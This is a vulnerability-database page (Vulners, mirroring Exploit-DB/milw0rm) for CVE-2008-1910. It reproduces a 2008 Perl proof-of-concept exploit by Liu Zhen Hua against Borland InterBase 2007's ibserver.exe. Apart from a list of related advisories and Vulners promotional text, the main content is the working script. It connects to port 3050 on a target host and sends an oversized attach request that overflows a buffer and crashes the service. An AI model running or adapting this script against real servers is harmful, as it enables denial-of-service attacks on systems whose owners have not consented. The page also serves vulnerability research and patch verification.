Lucene search
+L

Borland Interbase 2007 - 'ibserver.exe' Buffer Overflow (PoC)

🗓️ 11 Apr 2008 00:00:00Reported by Liu Zhen HuaType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 31 Views

Borland Interbase 2007 'ibserver.exe' Buffer Overflow Po

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2008-1910
11 Apr 200800:00
circl
Check Point Advisories
Borland Software InterBase ibserver.exe Service Attach Request Buffer Overflow (CVE-2008-1910)
18 Nov 201300:00
checkpoint_advisories
CVE
CVE-2008-1910
21 Apr 200823:00
cve
Cvelist
CVE-2008-1910
21 Apr 200823:00
cvelist
EUVD
EUVD-2008-1910
7 Oct 202500:30
euvd
NVD
CVE-2008-1910
22 Apr 200804:41
nvd
Prion
Stack overflow
22 Apr 200804:41
prion
Saint
Borland InterBase ibserver.exe Service Attach request buffer overflow
21 Apr 200800:00
saint
Saint
Borland InterBase ibserver.exe Service Attach request buffer overflow
21 Apr 200800:00
saint
Saint
Borland InterBase ibserver.exe Service Attach request buffer overflow
21 Apr 200800:00
saint
Rows per page
###############################################################################################################
#                                 POC.pl                                                                   #
###############################################################################################################
#!/usr/bin/perl -w
#Author:  Liu Zhen Hua <alau [at] 163.com>

use IO::Socket;
use strict;
my $host=$ARGV[0];
sub usage {
print "usage: perl poc.pl serverip\n";
}
if ($#ARGV < 0) {
usage();
exit();
}
my $victim = IO::Socket::INET->new(Proto=>'tcp',
                                PeerAddr=>$host,
                                PeerPort=>3050);
my $pad0 = "\x41"x1000;       #"\x00\x00\x03\xE8"
my $pad5 = "\x43"x16;
my $exploit = "\x00\x00\x00\x52\xFF\xFF\xFF\xFF\x00\x00\x03\xE8".$pad0."\x00\x00\x00\x10".$pad5;
print $victim $exploit ;
print " + Malicious  request sent ...\n";
sleep(1);
print "Done.\n";
close($victim);
exit;

# milw0rm.com [2008-04-11]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Nov 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 210
EPSS0.07291
31